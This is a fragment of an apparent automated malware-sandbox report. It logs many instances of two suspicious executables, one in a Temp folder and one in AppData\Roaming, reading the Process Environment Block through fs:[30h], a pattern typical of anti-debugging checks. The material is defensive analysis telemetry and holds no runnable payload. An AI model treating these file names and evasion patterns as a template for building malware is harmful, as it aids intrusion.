          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F29A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
